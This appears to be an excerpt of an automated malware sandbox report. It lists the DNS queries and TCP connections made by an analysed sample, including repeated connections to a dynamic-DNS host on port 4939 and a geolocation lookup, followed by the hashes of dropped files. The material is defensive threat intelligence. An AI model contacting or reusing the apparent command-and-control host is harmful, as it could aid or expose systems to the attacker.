US 8.8.8.8:53 209.205.72.20.in-addr.arpa udp
US 198.49.68.125:443 cadenaderegalos.com tcp
US 8.8.8.8:53 11.97.55.23.in-addr.arpa udp
US 8.8.8.8:53 myfrontmannysix.ddns.net udp
CA 199.189.26.138:4939 myfrontmannysix.ddns.net tcp
US 8.8.8.8:53 138.26.189.199.in-addr.arpa udp
CA 199.189.26.138:4939 myfrontmannysix.ddns.net tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 240.221.184.93.in-addr.arpa udp
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 52.111.229.43:443 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 131.109.69.13.in-addr.arpa udp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kmosm41a.nut.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Roaming\Contributors.Pap

MD5 6d3d810b1b531a393dd8a200f17378b8
SHA1 bc31c057297d2b467a46d843030f1ff377f55f1e
SHA256 786447c3a5269cec661eb9e7bea51a58df805afaceb116677ff1974cc0d6d7df
SHA512 a77ecb7cc1d0bb183fdef43747f7156bd72e5fcb32e2e8c7671a926707b313245e08b682ce03b6b862f9f4ff1f62cf566d98fbde3384c67b60c0a2cb8dcbf358

C:\Users\Admin\AppData\Local\Temp\fncgvusxhvdvdl

MD5 25a7e8d624c2bfdb2facdc50a1d9b965
SHA1 bbf90e7e78dcba692d6a35716d72cd1affc8cf9c
SHA256 880d0a92fcd2d68631b413e0cc98d71fc68337abb19f59901c075e058c694b47
SHA512 35e57b1fd68fd64c325d179323c3383c39cb00e37b42480c0962517eb8ffdffd5d3a95b77122161f651e45ab2fee4a8e5c3f604bd80351a2680f087ea2b9517f
